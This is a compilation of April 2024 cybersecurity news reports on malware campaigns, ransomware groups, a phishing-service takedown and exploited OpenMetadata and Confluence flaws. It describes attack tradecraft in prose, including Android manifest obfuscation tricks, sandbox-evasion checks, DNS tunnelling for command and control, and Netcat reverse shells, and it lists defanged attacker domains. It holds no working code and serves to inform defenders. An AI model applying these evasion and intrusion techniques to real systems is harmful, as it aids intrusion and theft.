"Waterbear is known for its complexity, as it uses a number of evasion mechanisms to minimize the chance of detection and analysis," Trend Micro researchers Cyris Tseng and Pierre Lee said in an analysis last week.
"In 2022, Earth Hundun began using the latest version of Waterbear — also known as Deuterbear — which has several changes, including anti-memory scanning and decryption routines, that make us consider it a different malware entity from the original Waterbear."
The cybersecurity firm is tracking the threat actor under the moniker Earth Hundun, which is known to be active since at least 2007. It also goes by other names such as Circuit Panda, HUAPI, Manga Taurus, Palmerworm, Red Djinn, and Temp.Overboard.
In a joint advisory published last September, cybersecurity and intelligence agencies from Japan and the U.S. attributed the adversary to China, describing its ability to modify router firmware and exploit routers' domain-trust relationships to pivot from international subsidiaries to their corporate headquarters based in the two countries.
"BlackTech actors use custom malware, dual-use tools, and living-off-the-land tactics, such as disabling logging on routers, to conceal their operations," the governments said.
"Upon gaining an initial foothold into a target network and gaining
administrator access to network edge devices, BlackTech cyber actors often
modify the firmware to hide their activity across the edge devices to further
maintain persistence in the network."
One of the crucial tools in its multifaceted arsenal is Waterbear (aka DBGPRINT), which has been put to use since 2009 and has been consistently updated over the years with improved defense evasion features.
The core remote access trojan is fetched from a command-and-control (C2) server by means of a downloader, which is launched using a loader that, in turn, is executed via a known technique called DLL side-loading.
The newest version of the implant supports nearly 50 commands, enabling it to perform a wide range of activities, including process enumeration and termination, file operations, window management, start and exit remote shell, screenshot capture, and Windows Registry modification, among others.
Also delivered using a similar infection flow since 2022 is Deuterbear, whose downloader implements an array of obfuscation methods to resist anti-analysis and uses HTTPS for C2 communications.
"Since 2009, Earth Hundun has continuously evolved and refined the Waterbear backdoor, as well as its many variants and branches," the researchers said.
"The Deuterbear downloader employs HTTPS encryption for network traffic protection and implements various updates in malware execution, such as altering the function decryption, checking for debuggers or sandboxes, and modifying traffic protocols."
Akira Ransomware Gang Extorts $42 Million; Now Targets Linux Servers
19.4.24
Ransom
The Hacker News
Threat actors behind the Akira
ransomware group have extorted approximately $42 million in illicit proceeds
after breaching the networks of more than 250 victims as of January 1, 2024.
"Since March 2023, Akira ransomware has impacted a wide range of businesses and critical infrastructure entities in North America, Europe, and Australia," cybersecurity agencies from the Netherlands and the U.S., along with Europol's European Cybercrime Centre (EC3), said in a joint alert.
"In April 2023, following an initial focus on Windows systems, Akira threat actors deployed a Linux variant targeting VMware ESXi virtual machines."
The double-extortion group has been observed using a C++ variant of the locker in the early stages, before shifting to a Rust-based code as of August 2023. It's worth noting that the e-crime actor is completely different from the Akira ransomware family that was active in 2017.
Initial access to target networks is facilitated by means of exploiting known flaws in Cisco appliances (e.g., CVE-2020-3259 and CVE-2023-20269).
Alternate vectors involve the use of Remote Desktop Protocol (RDP), spear-phishing, valid credentials, and virtual private network (VPN) services lacking in multi-factor authentication (MFA) protections.
Akira actors are also known to leverage various ways to set up persistence by creating a new domain account on the compromised system, as well as evade detection by abusing the Zemana AntiMalware driver to terminate antivirus-related processes via what's called a Bring Your Own Vulnerable Driver (BYOVD) attack.
To aid in privilege escalation, the adversary relies on credential scraping tools like Mimikatz and LaZagne, while Windows RDP is utilized to move laterally within the victim's network. Data exfiltration is accomplished through FileZilla, WinRAR, WinSCP, and RClone.
"Akira ransomware encrypts targeted systems using a hybrid encryption algorithm that combines Chacha20 and RSA," Trend Micro said in an analysis of the ransomware published in October 2023.
"Additionally, the Akira ransomware binary, like most modern ransomware binaries, has a feature that allows it to inhibit system recovery by deleting shadow copies from the affected system."
Blockchain and source code data suggests that Akira ransomware group is likely affiliated with the now-defunct Conti ransomware gang. A decryptor for Akira was released by Avast last July, but it's highly likely the shortcomings have since been plugged.
Akira's mutation to target Linux enterprise environments also follows similar
moves by other established ransomware families such as LockBit, Cl0p, Royal,
Monti, and RTM Locker.
LockBit's Struggles to Come Back#
The disclosure comes as Trend Micro
revealed that the sweeping law enforcement takedown of the prolific LockBit gang
earlier this February has had a significant operational and reputational impact
on the group's ability to bounce back, prompting it to post old and fake victims
on its new data leak site.
"LockBit was one of the most prolific and widely used RaaS strains in operation, with potentially hundreds of affiliates, including many associated with other prominent strains," Chainalysis noted in February.
The blockchain analytics firm said it uncovered cryptocurrency trails connecting a LockBit administrator to a journalist based in Sevastopol known as Colonel Cassad, who has a history of soliciting donations for Russian militia group operations in the sanctioned jurisdictions of Donetsk and Luhansk following the onset of the Russo-Ukrainian war in 2022.
It's worth pointing out that Cisco Talos, in January 2022, linked Colonel Cassad (aka Boris Rozhin) to an anti-Ukraine disinformation campaign orchestrated by the Russian state-sponsored group known as APT28.
"Following the operation, LockBitSupp [the alleged leader of LockBit] appears to be attempting to inflate the apparent victim count while also focusing on posting victims from countries whose law enforcement agencies participated in the disruption," Trend Micro said in a recent deep dive.
"This is possibly an attempt to reinforce the narrative that it would come back stronger and target those responsible for its disruption."
In an interview with Recorded Future News last month, LockBitSupp acknowledged the short-term decline in profits, but promised to improve their security measures and "work as long as my heart beats."
"Reputation and trust are key to attracting affiliates, and when these are lost, it's harder to get people to return. Operation Cronos succeeded in striking against one element of its business that was most important: its brand," Trend Micro stated.
Agenda Returns with an Updated Rust Version#
The development also follows the
Agenda ransomware group's (aka Qilin and Water Galura) use of an updated Rust
variant to infect VMWare vCenter and ESXi servers through Remote Monitoring and
Management (RMM) tools and Cobalt Strike.
"The Agenda ransomware's ability to spread to virtual machine infrastructure shows that its operators are also expanding to new targets and systems," the cybersecurity company said.
Even as a fresh crop of ransomware actors continues to energize the threat
landscape, it's also becoming clearer that "crude, cheap ransomware" sold on the
cybercrime underground is being put to use in real-world attacks, allowing
lower-tier individual threat actors to generate significant profit without
having to be a part of a well-organized group.
Interestingly, a majority of these varieties are available for a single, one-off price starting from as low as $20 for a single build, while a few others such as HardShield and RansomTuga are offered at no extra cost.
"Away from the complex infrastructure of modern ransomware, junk-gun ransomware allows criminals to get in on the action cheaply, easily, and independently," Sophos said, describing it as a "relatively new phenomenon" that further lowers the cost of entry.
"They can target small companies and individuals, who are unlikely to have the resources to defend themselves or respond effectively to incidents, without giving anyone else a cut."
OfflRouter Malware Evades Detection in Ukraine for Almost a Decade
19.4.24
Virus
The Hacker News
Select Ukrainian government
networks have remained infected with a malware called OfflRouter since 2015.
Cisco Talos said its findings are based on an analysis of over 100 confidential documents that were infected with the VBA macro virus and uploaded to the VirusTotal malware scanning platform since 2018. More than 20 such documents have been uploaded since 2022.
"The documents contained VBA code to drop and run an executable with the name 'ctrlpanel.exe,'" security researcher Vanja Svajcer said. "The virus is still active in Ukraine and is causing potentially confidential documents to be uploaded to publicly accessible document repositories."
A striking aspect of OfflRouter is its inability to spread via email, necessitating that it be propagated via other means, such as sharing documents and removable media, including USB memory sticks containing the infected documents.
"It would require manual user intervention to send an infected document as an email attachment," a Talos researcher told The Hacker News. "That could be the reason why the virus stayed under the radar for such a long time as it is not very noisy."
"We can only speculate as to why there is no automated spreading by email. That said, if the malware was attached to a document sent via email, the virus would still attempt to infect files located on removable media."
These design choices, intentional or otherwise, are said to have confined the spread of OfflRouter within Ukraine's borders and to a few organizations, thus escaping detection for almost 10 years.
It's currently not known who is responsible for the malware and there are no indications that it was developed by someone from Ukraine.
Whoever it is, they have been described as inventive yet inexperienced owing to the unusual propagation mechanism and the presence of several mistakes in the source code.
OfflRouter has been previously highlighted by MalwareHunterTeam as early as May 2018 and again by the Computer Security Incident Response Team Slovakia (CSIRT.SK) in August 2021, detailing infected documents uploaded to the National Police of Ukraine's website.
The modus operandi has remained virtually unchanged, with the VBA macro-embedded Microsoft Word documents dropping a .NET executable named "ctrlpanel.exe," which then infects all files with the .DOC (not .DOCX) extension found on the system and other removable media with the same macro.
"The infection iterates through a list of the document candidates to infect and uses an innovative method to check the document infection marker to avoid multiple infection processes – the function checks the document creation metadata, adds the creation times, and checks the value of the sum," Svajcer said.
"If the sum is zero, the document is considered already infected."
That said, the attack becomes successful only when VBA macros are enabled. Microsoft, as of July 2022, has been blocking macros by default in Office documents downloaded from the internet, prompting threat actors to seek other initial access pathways.
While Microsoft's preventive measure limits the success of such macro-based attacks, Cisco Talos told the publication that many organizations in the affected region, including government entities, are not using up-to-date Office versions.
"The main issue we tried to raise is not that a virus is active and affects Microsoft Office, but that users can unknowingly upload confidential documents to public repositories," it said. "Users need to double check for the malware infection."
Another key function of the malware is to make Windows Registry modifications so as to ensure that the executable runs every time upon booting the system.
"The virus targets only documents with the filename extension .DOC, the default extension for the OLE2 documents, and it will not try to infect other filename extensions," Svajcer said. "The default Word document filename extension for the more recent Word versions is .DOCX, so few documents will be infected as a result."
That's not all. Ctrlpanel.exe is also equipped to search for potential plugins (with the extension .ORP) present on removable drives and execute them on the machine, which implies the malware is expecting the plugins to be delivered via USB drives or CD-ROMs.
One the contrary, if the plugins are already present on a host, OfflRouter takes care of encoding them, copying the files to the root folder of the attached removable media with the filename extension .ORP, and manipulating them to make them hidden so that they are not visible through the File Explorer when plugging them into another device.
That said, one major unknown is whether the initial vector is a document or the executable module ctrlpanel.exe.
"The advantage of the two-module virus is that it can be spread as a standalone executable or as an infected document," Svajcer said.
"It may even be advantageous to initially spread as an executable as the module can run standalone and set the registry keys to allow execution of the VBA code and changing of the default saved file formats to .DOC before infecting documents. That way, the infection may be a bit stealthier."
Hackers Target Middle East Governments with Evasive "CR4T" Backdoor
19.4.24
Virus
The Hacker News
Government entities in the Middle
East have been targeted as part of a previously undocumented campaign to deliver
a new backdoor dubbed CR4T.
Russian cybersecurity company Kaspersky said it discovered the activity in February 2024, with evidence suggesting that it may have been active since at least a year prior. The campaign has been codenamed DuneQuixote.
"The group behind the campaign took steps to prevent collection and analysis of its implants and implemented practical and well-designed evasion methods both in network communications and in the malware code," Kaspersky said.
The starting point of the attack is a dropper, which comes in two variants -- a regular dropper that's either implemented as an executable or a DLL file and a tampered installer file for a legitimate tool named Total Commander.
Regardless of the method used, the primary function of the dropper is to extract an embedded command-and-control (C2) address that's decrypted using a novel technique to prevent the server address from being exposed to automated malware analysis tools.
Specifically, it entails obtaining the filename of the dropper and stringing it together with one of the many hard-coded snippets from Spanish poems present in the dropper code. The malware then calculates the MD5 hash of the combined string, which acts as the key to decode the C2 server address.
The dropper subsequently establishes connections with the C2 server and downloads a next-stage payload after providing a hard-coded ID as the User-Agent string in the HTTP request.
"The payload remains inaccessible for download unless the correct user agent is provided," Kaspersky said. "Furthermore, it appears that the payload may only be downloaded once per victim or is only available for a brief period following the release of a malware sample into the wild."
The trojanized Total Commander installer, on the other hand, carries a few differences despite retaining the main functionality of the original dropper.
It does away with the Spanish poem strings and implements additional anti-analysis checks that prevent a connection to the C2 server should the system have a debugger or a monitoring tool installed, the position of the cursor does not change after a certain time, the amount of RAM available is less than 8 GB, and the disk capacity is less than 40 GB.
CR4T ("CR4T.pdb") is a C/C++-based memory-only implant that grants attackers access to a console for command line execution on the infected machine, performs file operations, and uploads and downloads files after contacting the C2 server.
Kaspersky said it also unearthed a Golang version of CR4T with identical features, in addition to possessing the ability to execute arbitrary commands and create scheduled tasks using the Go-ole library.
On top of that, the Golang CR4T backdoor is equipped to achieve persistence by utilizing the COM objects hijacking technique and leverage the Telegram API for C2 communications.
The presence of the Golang variant is an indication that the unidentified threat actors behind DuneQuixote are actively refining their tradecraft with cross-platform malware.
"The 'DuneQuixote' campaign targets entities in the Middle East with an interesting array of tools designed for stealth and persistence," Kaspersky said.
"Through the deployment of memory-only implants and droppers masquerading as legitimate software, mimicking the Total Commander installer, the attackers demonstrate above average evasion capabilities and techniques."
FIN7 Cybercrime Group Targeting U.S. Auto Industry with Carbanak Backdoor
19.4.24
APT
The Hacker News
The infamous cybercrime syndicate
known as FIN7 has been linked to a spear-phishing campaign targeting the U.S.
automotive industry to deliver a known backdoor called Carbanak (aka Anunak).
"FIN7 identified employees at the company who worked in the IT department and had higher levels of administrative rights," the BlackBerry research and intelligence team said in a new write-up.
"They used the lure of a free IP scanning tool to run their well-known Anunak backdoor and gain an initial foothold utilizing living off the land binaries, scripts, and libraries (LOLBAS)."
FIN7, also known as Carbon Spider, Elbrus, Gold Niagara, ITG14, and Sangria Tempest, is a well-known financially motivated e-crime group that has a track record of striking a wide range of industry verticals to deliver malware capable of stealing information from point-of-sale (PoS) systems since 2012.
In recent years, the threat actor has transitioned to conducting ransomware operations, delivering various strains like Black Basta, Cl0p, DarkSide, and REvil. Two Ukrainian members of the group, Fedir Hladyr and Andrii Kolpakov, have been sentenced to prison in the U.S. to date.
The latest campaign discovered by BlackBerry in late 2023 starts with a
spear-phishing email that embeds a booby-trapped link pointing to a bogus site
("advanced-ip-sccanner[.]com") that masquerades as Advanced IP Scanner.
"This fake site redirected to 'myipscanner[.]com,' which in turn redirected to an attacker-owned Dropbox that downloaded the malicious executable WsTaskLoad.exe onto the victim's machine," the Canadian cybersecurity company said.
The binary, for its part, initiates a multi-stage process that ultimately leads to the execution of Carbanak. It's also designed to deliver additional payloads such as POWERTRASH and establish persistence by installing OpenSSH for remote access.
It's currently not known if the threat actors were planning on deploying ransomware, as the infected system was detected early on and removed from the network before it could reach the lateral movement stage.
While the target of the attack was a "large multinational automotive manufacturer" based in the U.S., BlackBerry said it found several similar malicious domains on the same provider, indicating that it may be part of a wider campaign by FIN7.
To mitigate the risks posed by such threats, it's recommended that organizations be on the lookout for phishing attempts, enable multi-factor authentication (MFA), keep all software and systems up-to-date, and monitor for unusual login attempts.
New Android Trojan 'SoumniBot' Evades Detection with Clever Tricks
18.4.24
OS
The Hacker News
A new Android trojan called
SoumniBot has been detected in the wild targeting users in South Korea by
leveraging weaknesses in the manifest extraction and parsing procedure.
The malware is "notable for an unconventional approach to evading analysis and detection, namely obfuscation of the Android manifest," Kaspersky researcher Dmitry Kalinin said in a technical analysis.
Every Android app comes with a manifest XML file ("AndroidManifest.xml") that's located in the root directory and declares the various components of the app, as well as the permissions and the hardware and software features it requires.
Knowing that threat hunters typically commence their analysis by inspecting the app's manifest file to determine its behavior, the threat actors behind the malware have been found to leverage three different techniques to resist analysis.
The first method involves the use of an invalid Compression method value when unpacking the APK's manifest file using the libziparchive library, which treats any value other than 0x0000 or 0x0008 as uncompressed.
"This allows app developers to put any value except 8 into the Compression method and write uncompressed data," Kalinin explained.
"Although any unpacker that correctly implements compression method validation would consider a manifest like that invalid, the Android APK parser recognizes it correctly and allows the application to be installed."
It's worth pointing out here that the method has been adopted by threat actors associated with several Android banking trojans since April 2023.
Secondly, SoumniBot misrepresents the archived manifest file size, providing a value that exceeds the actual figure, as a result of which the "uncompressed" file is directly copied, with the manifest parser ignoring the rest of the "overlay" data that takes up the rest of the available space.
"Stricter manifest parsers wouldn't be able to read a file like that, whereas the Android parser handles the invalid manifest without any errors," Kalinin said.
The final technique has to do with utilizing long XML namespace names in the manifest file, thus making it difficult for analysis tools to allocate enough memory to process them. That said, the manifest parser is designed to ignore namespaces, and, as a result, no errors are raised when handling the file.
SoumniBot, once launched, requests its configuration information from a hard-coded server address to obtain the servers used to send the collected data and receive commands using the MQTT messaging protocol, respectively.
It's designed to launch a malicious service that restarts every 16 minutes if it terminates for some reason, and uploads the information every 15 seconds. This includes device metadata, contact lists, SMS messages, photos, videos, and a list of installed apps.
The malware is also capable of adding and deleting contacts, sending SMS messages, toggling silent mode, and enabling Android's debug mode, not to mention hiding the app icon to make it difficult to uninstall from the device.
One noteworthy feature of SoumniBot is its ability to search the external storage media for .key and .der files containing paths to "/NPKI/yessign," which refers to the digital signature certificate service offered by South Korea for governments (GPKI), banks, and online stock exchanges (NPKI).
"These files are digital certificates issued by Korean banks to their clients and used for signing in to online banking services or confirming banking transactions," Kalinin said. "This technique is quite uncommon for Android banking malware."
Earlier this year, cybersecurity company S2W revealed details of a malware campaign undertaken by the North Korea-linked Kimusuky group that made use of a Golang-based information stealer called Troll Stealer to siphon GPKI certificates from Windows systems.
"Malware creators seek to maximize the number of devices they infect without being noticed," Kalinin concluded. "This motivates them to look for new ways of complicating detection. The developers of SoumniBot unfortunately succeeded due to insufficiently strict validations in the Android manifest parser code."
Global Police Operation Disrupts 'LabHost' Phishing Service, Over 30 Arrested
Worldwide
18.4.24
Phishing
The Hacker News
As many as 37 individuals have been
arrested as part of an international crackdown on a cybercrime service called
LabHost that has been used by criminal actors to steal personal credentials from
victims around the world.
Described as one of the largest Phishing-as-a-Service (PhaaS) providers, LabHost offered phishing pages targeting banks, high-profile organizations, and other service providers located primarily in Canada, the U.S., and the U.K.
As part of the operation, codenamed Nebulae, two LabHost users from Melbourne and Adelaide were arrested on April 17, with three others arrested and charged with drug-related offenses.
"Australian offenders are allegedly among 10,000 cybercriminals globally who have used the platform, known as LabHost, to trick victims into providing their personal information, such as online banking logins, credit card details and passwords, through persistent phishing attacks sent via texts and emails," the Australian Federal Police (AFP) said in a statement.
The Europol-led coordinated effort also witnessed 32 other individuals being apprehended between April 14 and 17, including four in the U.K. who are allegedly responsible for developing and running the service. In total, 70 addresses were searched across the world.
Coinciding with the arrests, LabHost ("lab-host[.]ru") and all its associated cluster of phishing sites have been confiscated and replaced with a message announcing their seizure.
LabHost was documented earlier this year by Fortra, detailing its PhaaS targeting popular brands globally for anywhere between $179 to $300 per month. It first emerged in the fourth quarter of 2021, coinciding with the availability of another PhaaS service called Frappo.
"LabHost divides their available phishing kits between two separate subscription packages: a North American membership covering U.S. and Canadian brands, and an international membership consisting of various global brands (and excluding the NA brands)," the company said.
According to Trend Micro, LabHost also provided phishing pages for Spotify, postal services such as DHL and An Post, car toll services, and insurance providers, besides allowing customers to request the creation of bespoke phishing pages for target brands.
"Since the platform takes care of most of the tedious tasks in developing and managing phishing page infrastructure, all the malicious actor needs is a virtual private server (VPS) to host the files and from which the platform can automatically deploy," Trend Micro said.
The phishing pages – links to which are distributed via phishing and smishing
campaigns – are designed to mimic banks, government entities, and other major
organizations, deceiving users into entering their credentials and two-factor
authentication (2FA) codes.
Customers of the phishing kit, which comprises the infrastructure to host the fraudulent websites as well as email and SMS content generation services, could then use the stolen information to take control of the online accounts and make unauthorized fund transfers from victims' bank accounts.
The captured information encompassed names and addresses, emails, dates of birth, standard security question answers, card numbers, passwords, and PINs.
"Labhost offered a menu of over 170 fake websites providing convincing phishing pages for its users to choose from," Europol said, adding law enforcement agencies from 19 countries participated in the disruption.
"What made LabHost particularly destructive was its integrated campaign management tool named LabRat. This feature allowed cybercriminals deploying the attacks to monitor and control those attacks in real time. LabRat was designed to capture two-factor authentication codes and credentials, allowing the criminals to bypass enhanced security measures."
LabHost's phishing infrastructure is estimated to include more than 40,000 domains. More than 94,000 victims have been identified in Australia and approximately 70,000 U.K. victims have been found to have entered their details in one of the bogus sites.
The U.K. Metropolitan Police said LabHost has received about £1 million ($1,173,000) in payments from criminal users since its launch. The service is estimated to have obtained 480,000 card numbers, 64,000 PIN numbers, as well as no less than one million passwords used for websites and other online services.
PhaaS platforms like LabHost lower the barrier for entry into the world of cybercrime, permitting aspiring and unskilled threat actors to mount phishing attacks at scale. In other words, a PhaaS makes it possible to outsource the need to develop and host phishing pages.
"LabHost is yet another example of the borderless nature of cybercrime and the takedown reinforces the powerful outcomes that can be achieved through a united, global law enforcement front," said AFP Acting Assistant Commissioner Cyber Command Chris Goldsmid.
The development comes as Europol revealed that organized criminal networks are increasingly agile, borderless, controlling, and destructive (ABCD), underscoring the need for a "concerted, sustained, multilateral response and joint cooperation."
Hackers Exploit OpenMetadata Flaws to Mine Crypto on Kubernetes
18.4.24
Exploit
The Hacker News
Threat actors are actively
exploiting critical vulnerabilities in OpenMetadata to gain unauthorized access
to Kubernetes workloads and leverage them for cryptocurrency mining activity.
That's according to the Microsoft Threat Intelligence team, which said the flaws have been weaponized since the start of April 2024.
OpenMetadata is an open-source platform that operates as a metadata management tool, offering a unified solution for data asset discovery, observability, and governance.
The flaws in question – all discovered and credited to security researcher Alvaro Muñoz – are listed below -
CVE-2024-28847 (CVSS score: 8.8) - A Spring Expression Language (SpEL) injection
vulnerability in PUT /api/v1/events/subscriptions (fixed in version 1.2.4)
CVE-2024-28848 (CVSS score: 8.8) - A SpEL injection vulnerability in GET
/api/v1/policies/validation/condition/<expr> (fixed in version 1.2.4)
CVE-2024-28253 (CVSS score: 8.8) - A SpEL injection vulnerability in PUT
/api/v1/policies (fixed in version 1.3.1)
CVE-2024-28254 (CVSS score: 8.8) -
A SpEL injection vulnerability in GET
/api/v1/events/subscriptions/validation/condition/<expr> (fixed in version
1.2.4)
CVE-2024-28255 (CVSS score: 9.8) - An authentication bypass
vulnerability (fixed in version 1.2.4)
Successful exploitation of the
vulnerabilities could allow a threat actor to bypass authentication and achieve
remote code execution.
The modus operandi uncovered by Microsoft entails the targeting of internet-exposed OpenMetadata workloads that have been left unpatched to gain code execution on the container running the OpenMetadata image.
Upon gaining an initial foothold, the threat actors have been observed carrying out reconnaissance activities to determine their level of access to the compromised environment and gather details about the network and hardware configuration, operating system version, the number of active users, and the environment variables.
"This reconnaissance step often involves contacting a publicly available service," security researchers Hagai Ran Kestenberg and Yossi Weizman said.
"In this specific attack, the attackers send ping requests to domains that end with oast[.]me and oast[.]pro, which are associated with Interactsh, an open-source tool for detecting out-of-band interactions."
In doing so, the idea is to validate network connectivity from the infiltrated
system to attacker-controlled infrastructure without raising any red flags,
thereby giving threat actors the confidence to establish command-and-control
(C2) communications and deploy additional payloads.
The end goal of the attacks is to retrieve and deploy a Windows or Linux variant of the crypto-mining malware from a remote server located in China, depending on the operating system.
Once the miner is launched, the initial payloads are removed from the workload, and the attackers initiate a reverse shell for their remote server using the Netcat tool, permitting them to commandeer the system. Persistence is achieved by setting cron jobs to run the malicious code at predefined intervals.
Interestingly, the threat actor also leaves behind a personal note telling that they are poor and that they need the money to buy a car and a suite. "I don't want to do anything illegal," the note reads.
OpenMetadata users are advised to switch to strong authentication methods, avoid using default credentials, and update their images to the latest version.
"This attack serves as a valuable reminder of why it's crucial to stay compliant and run fully patched workloads in containerized environments," the researchers said.
The development comes as publicly accessible Redis servers that have the authentication feature disabled or have unpatched flaws are being targeted to install Metasploit Meterpreter payloads for post-exploitation.
"When Metasploit is installed, the threat actor can take control of the infected system and also dominate the internal network of an organization using the various features offered by the malware," the AhnLab Security Intelligence Center (ASEC) said.
It also follows a report from WithSecure that detailed how search permissions on Docker directories could be abused to achieve privilege escalation. It's worth pointing out that the issue (CVE-2021-41091, CVSS score: 6.3) was previously flagged by CyberArk in February 2022, and addressed by Docker in version 20.10.9.
"The setting of the searchable bit for other users on /var/lib/docker/ and child directories can allow for a low-privileged attacker to gain access to various containers' filesystems," WithSecure said.
Malicious Google Ads Pushing Fake IP Scanner Software with Hidden Backdoor
18.4.24
Virus
The Hacker News
A new Google malvertising campaign
is leveraging a cluster of domains mimicking a legitimate IP scanner software to
deliver a previously unknown backdoor dubbed MadMxShell.
"The threat actor registered multiple look-alike domains using a typosquatting technique and leveraged Google Ads to push these domains to the top of search engine results targeting specific search keywords, thereby luring victims to visit these sites," Zscaler ThreatLabz researchers Roy Tay and Sudeep Singh said.
As many as 45 domains are said to have been registered between November 2023 and March 2024, with the sites masquerading as port scanning and IT management software such as Advanced IP Scanner, Angry IP Scanner, IP scanner PRTG, and ManageEngine.
While this is not the first time threat actors are banking on malvertising techniques to serve malware via lookalike sites, the development marks the first time the delivery vehicle is being used to propagate a sophisticated Windows backdoor.
Thus, users who end up searching for such tools are displayed bogus sites that include JavaScript code designed to download a malicious file ("Advanced-ip-scanner.zip") upon clicking the download button.
Present within the ZIP archive is a DLL file ("IVIEWERS.dll") and an executable ("Advanced-ip-scanner.exe"), the latter of which uses DLL side-loading to load the DLL and activate the infection sequence.
The DLL file is responsible for injecting the shellcode into the "Advanced-ip-scanner.exe" process via a technique called process hollowing, following which the injected EXE file unpacks two additional files – OneDrive.exe and Secur32.dll.
OneDrive.exe, a legitimate signed Microsoft binary, is then abused to sideload Secur32.dll, and ultimately execute the shellcode backdoor, but not before setting up persistence on the host by means of a scheduled task and disabling Microsoft Defender Antivirus.
The backdoor – so named for its use of DNS MX queries for command-and-control (C2) – is designed to gather system information, run commands via cmd.exe, and perform basic file manipulation operations such as reading, writing, and deleting files.
It sends requests to the C2 server ("litterbolo[.]com") by encoding the data in
the subdomain(s) of the Fully Qualified Domain Name (FQDN) in a DNS mail
exchange (MX) query packet and receives commands encoded within the response
packet.
"The backdoor uses techniques such as multiple stages of DLL side-loading and DNS tunneling for command-and-control (C2) communication as a means to evade endpoint and network security solutions, respectively," Tay and Singh said.
"In addition, the backdoor uses evasive techniques like anti-dumping to prevent memory analysis and hinder forensics security solutions."
There is currently no indication of where the malware operators originate from or what their intentions are, but Zscaler said it identified two accounts created by them on criminal underground forums like blackhatworld[.]com and social-eng[.]ru using the email address wh8842480@gmail[.]com, which was also used to register a domain spoofing Advanced IP Scanner.
Specifically, the threat actor has been found engaging in posts offering ways to set up unlimited Google AdSense threshold accounts way back in June 2023, indicating their interest in launching their own long-lasting malvertising campaign.
"Google Ads threshold accounts and techniques for abusing them are often traded on BlackHat forums," the researchers said. "Many times they offer a way for the threat actor to add as many credits as possible to run Google Ads campaigns."
"This allows the threat actors to run campaigns without actually paying until the threshold limit. A reasonably high threshold limit lets the threat actor run the ad campaign for a significant amount of time."
Russian APT Deploys New 'Kapeka' Backdoor in Eastern European Attacks
18.4.24
APT
The Hacker News
A previously undocumented
"flexible" backdoor called Kapeka has been "sporadically" observed in cyber
attacks targeting Eastern Europe, including Estonia and Ukraine, since at least
mid-2022.
The findings come from Finnish cybersecurity firm WithSecure, which attributed the malware to the Russia-linked advanced persistent threat (APT) group tracked as Sandworm (aka APT44 or Seashell Blizzard). Microsoft is tracking the same malware under the name KnuckleTouch.
"The malware [...] is a flexible backdoor with all the necessary functionalities to serve as an early-stage toolkit for its operators, and also to provide long-term access to the victim estate," security researcher Mohammad Kazem Hassan Nejad said.
Kapeka comes fitted with a dropper that's designed to launch and execute a backdoor component on the infected host, after which it removes itself. The dropper is also responsible for setting up persistence for the backdoor either as a scheduled task or autorun registry, depending on whether the process has SYSTEM privileges.
Microsoft, in its own advisory released in February 2024, described Kapeka as involved in multiple campaigns distributing ransomware and that it can be used to carry out a variety of functions, such as stealing credentials and other data, conducting destructive attacks, and granting threat actors remote access to the device.
The backdoor is a Windows DLL written in C++ and features an embedded command-and-control (C2) configuration that's used to establish contact with an actor-controlled server and holds information about the frequency at which the server needs to be polled in order to retrieve commands.
Besides masquerading as a Microsoft Word add-in to make it appear genuine, the backdoor DLL gathers information about the compromised host and implements multi-threading to fetch incoming instructions, process them, and exfiltrate the results of the execution to the C2 server.
"The backdoor uses WinHttp 5.1 COM interface (winhttpcom.dll) to implement its
network communication component," Nejad explained. "The backdoor communicates
with its C2 to poll for tasks and to send back fingerprinted information and
task results. The backdoor utilizes JSON to send and receive information from
its C2."
The implant is also capable of updating its C2 configuration on-the-fly by receiving a new version from the C2 server during polling. Some of the main features of the backdoor allow it to read and write files from and to disk, launch payloads, execute shell commands, and even upgrade and uninstall itself.
The exact method through which the malware is propagated is currently unknown. However, Microsoft noted that the dropper is retrieved from compromised websites using the certutil utility, underscoring the use of a legitimate living-off-the-land binary (LOLBin) to orchestrate the attack.
Kapeka's connections to Sandworm come conceptual and configuration overlaps with previously disclosed families like GreyEnergy, a likely successor to the BlackEnergy toolkit, and Prestige.
"It is likely that Kapeka was used in intrusions that led to the deployment of Prestige ransomware in late 2022," WithSecure said. "It is probable that Kapeka is a successor to GreyEnergy, which itself was likely a replacement for BlackEnergy in Sandworm's arsenal."
"The backdoor's victimology, infrequent sightings, and level of stealth and sophistication indicate APT-level activity, highly likely of Russian origin."
Critical Atlassian Flaw Exploited to Deploy Linux Variant of Cerber Ransomware
17.4.24
Ransom
The Hacker News
Threat actors are exploiting
unpatched Atlassian servers to deploy a Linux variant of Cerber (aka C3RB3R)
ransomware.
The attacks leverage CVE-2023-22518 (CVSS score: 9.1), a critical security vulnerability impacting the Atlassian Confluence Data Center and Server that allows an unauthenticated attacker to reset Confluence and create an administrator account.
Armed with this access, a threat actor could take over affected systems, leading to a full loss of confidentiality, integrity, and availability.
According to cloud security firm Cado, financially motivated cybercrime groups have been observed abusing the newly created admin account to install the Effluence web shell plugin and allow for the execution of arbitrary commands on the host.
"The attacker uses this web shell to download and run the primary Cerber payload," Nate Bill, threat intelligence engineer at Cado, said in a report shared with The Hacker News.
"In a default install, the Confluence application is executed as the 'confluence' user, a low privilege user. As such, the data the ransomware is able to encrypt is limited to files owned by the confluence user."
It's worth noting that the exploitation of CVE-2023-22518 to deploy Cerber ransomware was previously highlighted by Rapid7 in November 2023.
Written in C++, the primary payload acts as a loader for additional C++-based malware by retrieving them from a command-and-control (C2) server and then erasing its own presence from the infected host.
It includes "agttydck.bat," which is executed to download the encryptor ("agttydcb.bat") that's subsequently launched by the primary payload.
It's suspected that agttydck functions akin to a permission checker for the malware, assessing its ability to write to a /tmp/ck.log file. The exact purpose of this check is unclear.
The encryptor, on the other hand, traverses the root directory and encrypts all contents with a .L0CK3D extension. It also drops a ransom note in each directory. However, no data exfiltration takes place despite claims to the contrary in the note.
The most interesting aspect of the attacks is the use of pure C++ payloads, which are becoming something of a rarity given the shift to cross-platform programming languages like Golang and Rust.
"Cerber is a relatively sophisticated, albeit aging, ransomware payload," Bill said. "While the use of the Confluence vulnerability allows it to compromise a large amount of likely high value systems, often the data it is able to encrypt will be limited to just the confluence data and in well configured systems this will be backed up."
"This greatly limits the efficacy of the ransomware in extracting money from victims, as there is much less incentive to pay up," the researcher added.
The development comes amid the emergence of new ransomware families like Evil Ant, HelloFire, L00KUPRU (an Xorist ransomware variant), Muliaka (based on the leaked Conti ransomware code), Napoli (a Chaos ransomware variant), Red CryptoApp, Risen, and SEXi (based on the leaked Babuk ransomware code) that have been spotted targeting Windows and VMware ESXi servers.
